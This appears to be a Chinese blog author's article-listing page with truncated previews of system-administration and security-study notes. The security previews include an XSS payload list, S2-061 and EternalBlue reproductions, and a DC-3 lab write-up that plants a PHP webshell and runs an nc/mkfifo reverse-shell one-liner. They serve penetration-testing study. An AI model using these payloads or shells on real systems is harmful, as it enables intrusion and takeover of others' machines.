![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 57
魂梦aoin
这个作者很懒,什么都没留下…
展开
-
15ubuntu20.04离线安装openssh8.9.p1
一、依赖包安装依赖包下载网址:https://debian.pkgs.org/sid/debian-main-amd64/下载好将依赖包放入/software,安装mkdir /softwarecd /softwaredpkg -i libsepol1-dev_3.0-1_amd64.debdpkg -i libselinux1-dev_3.0-1build2_amd64.debdpkg -i libpam0g_1.3.1.11-1+dde_amd64.debdpkg -i li原创 2022-03-21 14:00:30 · 5394 阅读 · 0 评论 -
2021-11-15xss笔记
<script>alert(1)</script></script>"><script>prompt(1)</script></ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>"><img src=x onerror=prompt(1)>"><svg/onload=prompt(1)>"><iframe/src=javas原创 2021-11-15 17:43:58 · 845 阅读 · 0 评论 -
14linux离线源码安装mysql8.0.26教程
离线源码安装mysql1:下载tar包,如果有则直接使用下载连接:https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xzcd /home/dcsys/softwarels2:解压编译及安装mysqlsudo tar zxf mysql-boost-8.0.26.tar.gzmv mysql-8.0.26/ /data/mysql-8.0.26cd /data/m原创 2021-08-17 12:52:35 · 544 阅读 · 2 评论 -
11S2-061漏洞复现
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)1.漏洞描述S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。该漏洞影响版本范围是Struts 2.0.0到Struts 2.5.25。2.参考链接https://cwiki.apache.org/confluence/display/WW/S2-061https://github.com/ka1n4t/CVE-2020-17530htt原创 2020-12-30 22:48:48 · 185 阅读 · 0 评论 -
13http详解
HTTP/HTTPS的具体区别HTTP简要通信过程:1.建立连接–>2.发送请求数据包–>3.返回响应数据包–>4.关闭连接。1.浏览器建立与web之间的连接2.浏览器将请求数据打包(生成请求数据包)并发送到web服务器3.web服务器将响应处理结果打包(生成响应数据包)并发送到web服务器。4.web服务器关闭连接。HTTPS简要通信过程:1.浏览器发送请求–>2.服务器返回网站的证书信息–>3.进行证书校验,协商SSL连接的安全等级,生成密码、和公私钥。–&原创 2021-07-26 23:48:08 · 402 阅读 · 0 评论 -
12从kali移动硬盘安装、到主题。
前提1.一个移动硬盘或者性能好点的U盘。2.kali官方iso镜像,下载地址:点击以下载3.分区工具:diskgenius4.虚拟机VMware16.0一、首先给我们的移动硬盘/U盘分区我这里有一个300GB的移动硬盘,是我平时日常存放文件用的。当然这也不影响,我们给它分一个区专门安装linux系统。这样这个盘既可以日常存放资料,也可以作为便携式kali linux使用。我们的kali需要3个分区:(1)大小约100MB的EFI启动分区(2)大小约8GB的交换分区(swap)(3)大小约原创 2021-01-30 23:14:43 · 909 阅读 · 2 评论 -
10CTF01靶机渗透经历
123原创 2020-11-14 13:58:43 · 669 阅读 · 1 评论 -
09永恒之蓝与永恒之黑的复现
一、永恒之蓝1.简介2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入原创 2020-08-15 18:08:39 · 1866 阅读 · 0 评论 -
08DC3后续提权过程
1.GetShell寻找可以修改PHP文件的地方TemplatesBeez3 Details and Files写入一句话木马木马地址:http://192.168.48.136/templates/beez3/html/yjh.php用蚁剑连接填写密码和地址2.提权反弹shell攻击端监听端⼝等待回连nc -lvvp 2333靶机运行反弹shell命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&原创 2020-08-11 19:12:12 · 237 阅读 · 0 评论 -
07BugkuCTF的文件包含项目
进入BugkuCTF之前我们先了解一下文件包含的基础知识。一、文件包含1.概念文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。2.PHP 中的⽂件包含语句PHP 提供了四个⽂件包含的语句,四个语句之间略有不同:语句区别include()多次包含,如果包含失败,脚本产⽣警告,继续运⾏。include_once()⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。require()多次原创 2020-08-05 21:19:19 · 529 阅读 · 0 评论 -
06跨站请求伪造(CSRF)与口令(密码)安全
一、跨站请求伪造1.概述 黑客可以伪造管理员的正常请求,强制管理员给任意用户的发出各种请求。(1)基本概念 跨站请求伪造(Cross Site Request Forgery,CSRF) 。 CSRF 是⼀种攻击,它强制终端⽤户在当前对其进⾏身份验证后的Web 应⽤程序上执⾏⾮本意操作的攻 击。 CSRF 攻击的重点在于更改状态的请求,⽽不是盗取数据,因为攻击者⽆法查看伪造请求的响应。(2)关键点 受害者没有退出登录。 CS...原创 2020-08-03 20:48:12 · 339 阅读 · 0 评论